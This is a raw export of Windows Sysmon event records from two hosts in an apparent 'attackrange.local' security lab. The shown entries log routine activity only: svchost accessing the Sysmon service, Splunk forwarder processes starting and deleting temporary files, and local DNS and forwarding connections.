07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081049Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081048Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081047Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081046Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081045Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B1D4-615A-3901-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081044Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1D4-615A-3901-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081043Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.578{2FDD8D40-B1D4-615A-3901-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081042Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.999{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B69D8785AB86B61FF10AD665C856C57,SHA256=8E949660DAF8699884CC4B049AE6DEADD43B81E22428A11DAE3E35B990061D01,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103136Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:36.284{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49495-false10.0.1.12-8000- 23542300x8000000000000000103135Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:37.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5FC1105AB39256E707BD6523397A8D,SHA256=5194696130AB3C1AC382C57F4DC65C94BFB8540AB6CDC2A8283D27E92B6FEDC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081058Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:37.733{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65C953976222D0A35C81C26EC5164FA0,SHA256=4FF6A9D583D962FD354E9543829404685CFF6AF68A71B5CACE3039B59DEB0182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081057Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:37.124{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30760A43E5831D95FDD43CC8C713FCB2,SHA256=40D29E00C155CCA0F3A00137E68B1057E282787FDEE76D32917A4C9CD8B3C65A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103137Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:38.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C7AA2302606D42450D40167497894E1,SHA256=B77283DD8B06F67B2913C51137F39BD950B48F7E071A099E2372A0072A1139A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081059Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:38.187{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D851D7F95750C83672349277FE9A4A08,SHA256=167BD5E34557CEA0435F8FF19F514822D154772E25775FA5025055553BC3FFE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103138Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:39.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2163C291A206AD72DE8B040A7F5E7B7E,SHA256=F0E9EBE337D5A1203EEB0ABA44C57E5BEACFF599E660948FCA87E176ABBBA563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081061Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:39.187{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57CE46F2B8C92681FCAEAAB515DF7ABE,SHA256=DBD5998E3B0F161B8BB08410CCA8B1EDA3B353829272FB23391E8D892AC8093B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081060Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.567{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50000-false10.0.1.12-8000- 23542300x8000000000000000103139Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:40.924{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28B3A1042F01ADC0F0977129805E3C99,SHA256=061BADD9A182D43756E1395D62A1538418AAC602B591F1B6E7BB744E5C397F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081062Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:40.218{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AACF2B676959D6D8467B84DA9537BB,SHA256=502049B2545DEF229B068D55FF57AF4D3F7390BC20DAC1495DA575F893CC4D08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103140Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:41.940{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC5EE9FBABB010E3E0428E6F76B64BE,SHA256=A4437521A515A03C8AB8238E54FD18B8AE6E9B01A5BC2949A57E2D64EB3417FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081063Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:41.249{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=860B0DCC63A60872292B016412084442,SHA256=2A79FF0DA753BDF76E548B4E89D3F3A31374444A8B954C5107A26D2A325C114B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103143Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:42.956{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18112EB5587AEF5D8531A313414B90C4,SHA256=9AC4A1FDE00F2EEB95CED7AEB1B936E2AE49042E91ED3A4AED2B93BBA44ED525,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081064Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:42.249{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7082915B0E5297C44B6DA77DFA76DE24,SHA256=2D805E36126F60F9BE7C5641BC0FEE998F549D9647589766E6BCA27F237FFE4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103142Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:41.378{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49496-false10.0.1.12-8000- 10341000x8000000000000000103141Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:42.284{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103144Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:43.956{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BDED61C728CA8E75541EFB01F9105C2,SHA256=6CF53CB28B0627530D2B05FDD950C1408F196AB487FBCA02B29289B0A09C3A77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081065Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:43.327{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970C4691AE73DC7E5A8BEE7D5338C271,SHA256=8948389114B90339B7D4FEA20856203269E083C621355427DEE2510DC5215669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103145Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:44.971{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AA5EEC074654C649A7D6BAC60B58443,SHA256=6BFF04CCF8723574AE1BCC44A4FBE013649600AAEAEA2F3AC2243362F3BC0CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081067Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:44.327{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9DBED197CA1B634A51E1824263F34E,SHA256=EA61D88F2ADBE562D7684BA6E86F3AECC8140B36D050D6DAF93D838768432399,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081066Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:41.723{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50001-false10.0.1.12-8000- 23542300x800000000000000081068Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:45.452{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D17B914903B80D51851648EDABB69E2,SHA256=310CFDC063A75BC6E65966D42C86295EECA4A8390C37F972F7C31F09A7730A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081069Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:46.468{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3296D067139BAFAC63806643E0CD8C4,SHA256=0E300962D13C5475C79C200FEF3A2439B4C948B2B63E9CDB9D2F024432576113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103146Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:46.206{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB4DAA1EA8D9E5237DF8E42B0187A2EF,SHA256=773019FD20CD28A37BCAE8D4BA1FD0E715AEB7EEB19BE5375CB2115749934C19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081070Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:47.468{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D13FE03629C4480B4E788D67557612,SHA256=9EAB8F46DA4F8F48982B63215C0A4693BC5B437A38F8F389A7E8D731BBFF8F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103147Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:47.221{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFD0646AA49A5FFDE9FE3E9BF574188,SHA256=E9CE04D425B9668304EE8C157A02B5BF04D5F7BC6738872622BA8D12797F61F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081071Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:48.468{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3496AF4F28F5D5E9D8A3C335515B61A3,SHA256=E58E6F874766E30A54C6F9AAF75C3F4F3FF47BA6BAB88904049D485D6B2F7B0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103151Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:47.459{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.15-62453- 354300x8000000000000000103150Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:47.457{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.15-51699- 354300x8000000000000000103149Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:47.331{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49497-false10.0.1.12-8000- 23542300x8000000000000000103148Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:48.221{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8AEADA2E5620F1E0931E458AC25EC5,SHA256=E533360BBF347F1B2652ED51233BD62327700FCC2C648061B4FA97B6741ECB29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081072Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:49.499{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC3B0E0E5BE60706395A093DC5395255,SHA256=829EAA2DBFC74F40C78E1EA8E2152A2FB600D8B86C3F3165AE32C434D1374442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103152Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:49.221{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1169D4C18F5E245588A8D6F5241A727C,SHA256=B17A93ADEEB7CA90268295C7806D91D84CD34B6CE7B41475BC2D4C89409A70A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081074Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:50.499{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E14AF38B5E8408C95784945340764F,SHA256=A0CED04E379385ABED44AA3F27DC033D74079AB97617BF0FFFF336FD8E334254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103153Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:50.237{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D30489307EDBB8D11BB22409717B8461,SHA256=035F0355036218A654CB09314E4A91AA42686CAD706EB7BF08F16B2B195D1517,IMPHASH=00000000000000000000000000000000falsetrue 